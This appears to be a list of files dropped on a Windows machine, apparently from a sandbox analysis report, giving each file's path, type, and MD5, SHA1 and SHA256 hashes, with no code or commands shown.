C:\Users\user\AppData\Local\Temp\1t143vp1\CSC76ED9B8CEB314CD89B53DEEDCE956C.TMP	MSVC .res	15E8DA1D152EB6C3389A563525A94017	121EA2E9AA236B630573882405B89041CE48F819	E6DC56D3515382AF5EFCF9BDD68E390BFF230E9D9ACAC639A50CEC3F4E0666E0
C:\Users\user\AppData\Local\Temp\JavaDeployReg.log	ASCII text, with CRLF line terminators	68BCCF50922722CBCCB76E703C8B00B8	83606F4B80A2881F4A6F132FBCED45602A41C5C7	DBA713E0B32BAF2FEA75389DB89A3DB65F1530D57B3F2176A68CFE0BAD813E37
C:\Users\user\AppData\Local\Temp\RES4013.tmp	data	55EF56FD61C48C6E88411CDA6569D5B5	81037E9EC82448D4AC4B735548EA01D7AAB60938	383AB463A0A480886A2E3B5C5A5BBFA8D2C82EA68F62DBB04D521B0BC7FEEF21
C:\Users\user\AppData\Local\Temp\RES4E4C.tmp	data	F41C6EBBD8A4623DF4EB8B431DCB1F0F	A9F75A5D133069A4109A544042CB1CD03EA19B26	8366675C704F10589EAE99707F3B16A644688CAE3E95AA76B9D85E5EC52DB235
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mlr5a4ry.geh.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ufv1abv5.wj5.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\a5q0nxag\CSCA0E183A53BA24AF88D541EA58AA2F519.TMP	MSVC .res	21F0531F8A799402E2C6C603846FAA23	72F963DE226688EE961DAAFD025E43ADEC3E35E0	AC1B2EE25FF67A10474A9130F151529D03593D6DAA3B44E3FAF85A872B437CE4
C:\Users\user\AppData\Local\Temp\a5q0nxag\a5q0nxag.0.cs	UTF-8 Unicode (with BOM) text	AFB1799F1AEBC489A9583C7CF3EABC87	BF47182925DED6BD7A35E2EA57C44C4B5D28CDAD	AF6E88061E474FF75EE21A0521844D64DE10EFF291A6D4C7AB4850D9166F0F98
C:\Users\user\AppData\Local\Temp\a5q0nxag\a5q0nxag.cmdline	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators	7728646326D2783349F63C80B5A1E9A8	11FA7C7AB80D7F48E1635AA864ED60558CE5128D	18C3263F03020C7BA484030A63813FB252029D0114EF411C2D03182A9C6596A6
C:\Users\user\AppData\Local\Temp\a5q0nxag\a5q0nxag.dll	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows	4916BABAA468FF871F65EEE09C0505AA	B28A40D3A73EEAC948A71FB4C5100E9DCBDF4590	5CD8E20F9EC159A8C9AE6C0D12CB4DB328BA15668B2D5642065431B6E9A13A71
C:\Users\user\AppData\Local\Temp\a5q0nxag\a5q0nxag.out	ASCII text, with CRLF, CR line terminators	83B3C9D9190CE2C57B83EEE13A9719DF	ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E	B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
C:\Users\user\AppData\Local\Temp\~DF4CED7B9C6381C1A4.TMP	data	B5B031774717505B8C446D9C079DAF16	A7464CCC6DC4BBD88D5149D5ACBF4776C06B0157	EACC4763E272491DEBE2ABDE6BF2DBF492B8001CA45FDAE16BFCE0D2498A261A
C:\Users\user\AppData\Local\Temp\~DF7EA6945E3CD7EBAD.TMP	data	6907CC4727353076F08A2888A1E9BCF0	0A198C5FE744DBF4136C62282A84F0AA4AA2E5A6	0D663B170BE247D9BBEC14C8F61F31DE5B81C1E373BF4AF066FDB86302355CD2
C:\Users\user\AppData\Local\Temp\~DF80F9FBD8B5E4CA4D.TMP	data	08B66F5B75C25D3FB57113B87C6A7730	0121ADCF86C15F9B7489B1B6E7573FE49E0F9940	08CE91FDB5A313B6CF4CE6767A4D2FCB6338295CE67D93035AFF741AF6357A7E
C:\Users\user\AppData\Local\Temp\~DFE5A3706066494A6C.TMP	data	B09B5F6903BE7DC51898CC9B7FFE8180	029BC213182345B2E8605D379662FC52932F29D1	5604C00748D2EAD92B0BAE3CAC531F5EA29E2442801DE5AC52A20386B5B91FBA
C:\Users\user\Documents\20210709\PowerShell_transcript.610930.y20pEmdd.20210709134643.txt	UTF-8 Unicode (with BOM) text, with CRLF line terminators	62B191B186CE55F2F492C415E53B40DB	51344F4358B27B26535096DA8A7BBBB112CFB1B3	D0F93F702F52C6FABD6D91E0B0ADFBDBEF82483DBA30BA1E8092F4C69B77328D